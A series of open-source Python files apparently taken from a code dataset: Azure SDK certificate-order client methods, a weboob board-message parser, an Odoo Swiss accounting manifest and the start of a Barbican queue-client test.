certificate_order_name, # type: str
name, # type: str
key_vault_certificate, # type: "_models.AppServiceCertificateResource"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.AppServiceCertificateResource"]
"""Creates or updates a certificate and associates with key vault secret.
Creates or updates a certificate and associates with key vault secret.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param name: Name of the certificate.
:type name: str
:param key_vault_certificate: Key vault certificate resource Id.
:type key_vault_certificate: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either AppServiceCertificateResource or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateResource]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateResource"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_certificate_initial(
resource_group_name=resource_group_name,
certificate_order_name=certificate_order_name,
name=name,
key_vault_certificate=key_vault_certificate,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('AppServiceCertificateResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update_certificate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'} # type: ignore
def delete_certificate(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Delete the certificate associated with a certificate order.
Delete the certificate associated with a certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param name: Name of the certificate.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
# Construct URL
url = self.delete_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_certificate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'} # type: ignore
def update_certificate(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
name, # type: str
key_vault_certificate, # type: "_models.AppServiceCertificatePatchResource"
**kwargs # type: Any
):
# type: (...) -> "_models.AppServiceCertificateResource"
"""Creates or updates a certificate and associates with key vault secret.
Creates or updates a certificate and associates with key vault secret.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param name: Name of the certificate.
:type name: str
:param key_vault_certificate: Key vault certificate resource Id.
:type key_vault_certificate: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificatePatchResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AppServiceCertificateResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.AppServiceCertificateResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AppServiceCertificateResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_certificate.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(key_vault_certificate, 'AppServiceCertificatePatchResource')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('AppServiceCertificateResource', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('AppServiceCertificateResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_certificate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/certificates/{name}'} # type: ignore
def reissue(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
reissue_certificate_order_request, # type: "_models.ReissueCertificateOrderRequest"
**kwargs # type: Any
):
# type: (...) -> None
"""Reissue an existing certificate order.
Reissue an existing certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param reissue_certificate_order_request: Parameters for the reissue.
:type reissue_certificate_order_request: ~azure.mgmt.web.v2018_02_01.models.ReissueCertificateOrderRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self.reissue.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(reissue_certificate_order_request, 'ReissueCertificateOrderRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
reissue.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/reissue'} # type: ignore
def renew(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
renew_certificate_order_request, # type: "_models.RenewCertificateOrderRequest"
**kwargs # type: Any
):
# type: (...) -> None
"""Renew an existing certificate order.
Renew an existing certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param renew_certificate_order_request: Renew parameters.
:type renew_certificate_order_request: ~azure.mgmt.web.v2018_02_01.models.RenewCertificateOrderRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self.renew.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(renew_certificate_order_request, 'RenewCertificateOrderRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
renew.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/renew'} # type: ignore
def resend_email(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Resend certificate email.
Resend certificate email.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
# Construct URL
url = self.resend_email.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
resend_email.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/resendEmail'} # type: ignore
def resend_request_emails(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
name_identifier, # type: "_models.NameIdentifier"
**kwargs # type: Any
):
# type: (...) -> None
"""Verify domain ownership for this certificate order.
Verify domain ownership for this certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param name_identifier: Email address.
:type name_identifier: ~azure.mgmt.web.v2018_02_01.models.NameIdentifier
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
# Construct URL
url = self.resend_request_emails.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(name_identifier, 'NameIdentifier')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
resend_request_emails.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/resendRequestEmails'} # type: ignore
def retrieve_site_seal(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
site_seal_request, # type: "_models.SiteSealRequest"
**kwargs # type: Any
):
# type: (...) -> "_models.SiteSeal"
"""Verify domain ownership for this certificate order.
Verify domain ownership for this certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:param site_seal_request: Site seal request.
:type site_seal_request: ~azure.mgmt.web.v2018_02_01.models.SiteSealRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: SiteSeal, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2018_02_01.models.SiteSeal
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SiteSeal"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.retrieve_site_seal.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(site_seal_request, 'SiteSealRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('SiteSeal', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
retrieve_site_seal.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/retrieveSiteSeal'} # type: ignore
def verify_domain_ownership(
self,
resource_group_name, # type: str
certificate_order_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
"""Verify domain ownership for this certificate order.
Verify domain ownership for this certificate order.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param certificate_order_name: Name of the certificate order.
:type certificate_order_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
# Construct URL
url = self.verify_domain_ownership.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'certificateOrderName': self._serialize.url("certificate_order_name", certificate_order_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
verify_domain_ownership.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{certificateOrderName}/verifyDomainOwnership'} # type: ignore
def retrieve_certificate_actions(
self,
resource_group_name, # type: str
name, # type: str
**kwargs # type: Any
):
# type: (...) -> List["_models.CertificateOrderAction"]
"""Retrieve the list of certificate actions.
Retrieve the list of certificate actions.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the certificate order.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of CertificateOrderAction, or the result of cls(response)
:rtype: list[~azure.mgmt.web.v2018_02_01.models.CertificateOrderAction]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.CertificateOrderAction"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
# Construct URL
url = self.retrieve_certificate_actions.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[CertificateOrderAction]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
retrieve_certificate_actions.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/retrieveCertificateActions'} # type: ignore
def retrieve_certificate_email_history(
self,
resource_group_name, # type: str
name, # type: str
**kwargs # type: Any
):
# type: (...) -> List["_models.CertificateEmail"]
"""Retrieve email history.
Retrieve email history.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the certificate order.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of CertificateEmail, or the result of cls(response)
:rtype: list[~azure.mgmt.web.v2018_02_01.models.CertificateEmail]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.CertificateEmail"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-02-01"
accept = "application/json"
# Construct URL
url = self.retrieve_certificate_email_history.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('[CertificateEmail]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
retrieve_certificate_email_history.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.CertificateRegistration/certificateOrders/{name}/retrieveEmailHistory'} # type: ignore
| mit |
laurentb/weboob | modules/dlfp/pages/board.py | 2 | 2106 | # -*- coding: utf-8 -*-
# Copyright(C) 2010-2011 Romain Bignon
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
import re
from logging import warning
from weboob.browser.pages import HTMLPage, LoggedPage
class Message(object):
TIMESTAMP_REGEXP = re.compile(r'(\d{4})(\d{2})(\d{2})(\d{2})(\d{2})(\d{2})')
def __init__(self, id, timestamp, login, message, is_me):
self.id = id
self.timestamp = timestamp
self.login = login
self.message = message
self.is_me = is_me
self.norloge = timestamp
m = self.TIMESTAMP_REGEXP.match(timestamp)
if m:
self.norloge = '%02d:%02d:%02d' % (int(m.group(4)),
int(m.group(5)),
int(m.group(6)))
else:
warning('Unable to parse timestamp "%s"' % timestamp)
class BoardIndexPage(LoggedPage, HTMLPage):
def get_messages(self, last=None):
msgs = []
for post in self.doc.xpath('//post'):
m = Message(int(post.attrib['id']),
post.attrib['time'],
post.find('login').text,
post.find('message').text,
post.find('login').text.lower() == self.browser.username.lower())
if last is not None and last == m.id:
break
msgs.append(m)
return msgs
| lgpl-3.0 |
bala4901/odoo | addons/l10n_ch/__openerp__.py | 160 | 2936 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Nicolas Bessi. Copyright Camptocamp SA
# Financial contributors: Hasa SA, Open Net SA,
# Prisme Solutions Informatique SA, Quod SA
#
# Translation contributors: brain-tec AG, Agile Business Group
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{'name': 'Switzerland - Accounting',
'description': """
Swiss localization
==================
**Multilang swiss STERCHI account chart and taxes**
**Author:** Camptocamp SA
**Financial contributors:** Prisme Solutions Informatique SA, Quod SA
**Translation contributors:** brain-tec AG, Agile Business Group
**This release will introduce major changes to l10n_ch.**
Due to important refactoring needs and the Switzerland adoption of new international payment standard during 2013-2014. We have reorganised the swiss localization addons this way:
- **l10n_ch**: Multilang swiss STERCHI account chart and taxes (official addon)
- **l10n_ch_base_bank**: Technical module that introduces a new and simplified version of bank type management
- **l10n_ch_bank**: List of swiss banks
- **l10n_ch_zip**: List of swiss postal zip
- **l10n_ch_dta**: Support of dta payment protocol (will be deprecated end 2014)
- **l10n_ch_payment_slip**: Support of ESR/BVR payment slip report and reconciliation. Report refactored with easy element positioning.
- **l10n_ch_sepa**: Alpha implementation of PostFinance SEPA/PAIN support will be completed during 2013/2014
The modules will be soon available on OpenERP swiss localization on launchpad:
https://launchpad.net/openerp-swiss-localization
""",
'version': '7.0',
'author': 'Camptocamp',
'category': 'Localization/Account Charts',
'website': 'http://www.camptocamp.com',
'depends': ['account', 'l10n_multilang'],
'data': ['sterchi_chart/account.xml',
'sterchi_chart/vat2011.xml',
'sterchi_chart/fiscal_position.xml' ],
'demo': [],
'test': [],
'auto_install': False,
'installable': True,
'images': ['images/config_chart_l10n_ch.jpeg','images/l10n_ch_chart.jpeg']
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
openstack/barbican | barbican/tests/queue/test_client.py | 1 | 2387 | # Copyright (c) 2013-2014 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
from barbican import queue
from barbican.queue import client
from barbican.tests import utils
class WhenUsingAsyncTaskClient(utils.BaseTestCase):
"""Test using the asynchronous task client."""
def setUp(self):
super(WhenUsingAsyncTaskClient, self).setUp()
# Mock out the queue get_client() call:
self.mock_client = mock.MagicMock()
self.mock_client.cast.return_value = None
get_client_config = {
'return_value': self.mock_client
}
self.get_client_patcher = mock.patch(
'barbican.queue.get_client',
